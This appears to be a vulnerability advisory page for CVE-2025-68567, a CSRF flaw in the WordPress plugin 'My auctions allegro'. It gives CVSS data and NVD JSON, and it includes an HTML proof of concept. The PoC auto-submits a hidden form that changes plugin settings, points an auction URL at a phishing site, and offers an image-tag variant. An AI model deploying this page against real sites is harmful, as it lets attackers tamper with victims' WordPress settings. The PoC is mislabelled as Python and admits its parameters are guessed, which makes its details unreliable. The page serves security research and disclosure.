Security Vulnerability Report
中文
CVE-2025-68567 CVSS 5.4 MEDIUM

CVE-2025-68567

Published: 2025-12-24 13:16:24
Last Modified: 2026-04-27 19:16:31

Description

Cross-Site Request Forgery (CSRF) vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Cross Site Request Forgery.This issue affects My auctions allegro: from n/a through <= 3.6.33.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

My auctions allegro free edition <= 3.6.33

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68567 --> <!-- Target: WordPress My auctions allegro plugin <= 3.6.33 --> <!-- This PoC demonstrates a CSRF attack that could modify plugin settings --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-68567</title> </head> <body> <h1>Malicious Page - Do Not Access</h1> <p>This page demonstrates the CSRF vulnerability in My auctions allegro plugin.</p> <!-- Form to trigger malicious action --> <form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Plugin action parameters - modify based on actual vulnerable endpoint --> <input type="hidden" name="action" value="my_allegro_save_settings"> <input type="hidden" name="allegro_api_key" value="malicious_api_key"> <input type="hidden" name="allegro_auction_url" value="http://malicious-site.com/phishing"> <input type="hidden" name="allegro_sync_interval" value="0"> <!-- CSRF token is missing in vulnerable version --> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit form when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); }); </script> <p>If you see this, the attack failed.</p> </body> </html> <!-- Alternative: Image tag based CSRF (for GET requests) --> <!-- <img src="http://target-site/wp-admin/admin.php?page=my-allegro&action=delete&id=1" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68567", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:23.593", "lastModified": "2026-04-27T19:16:31.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Cross Site Request Forgery.This issue affects My auctions allegro: from n/a through <= 3.6.33."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}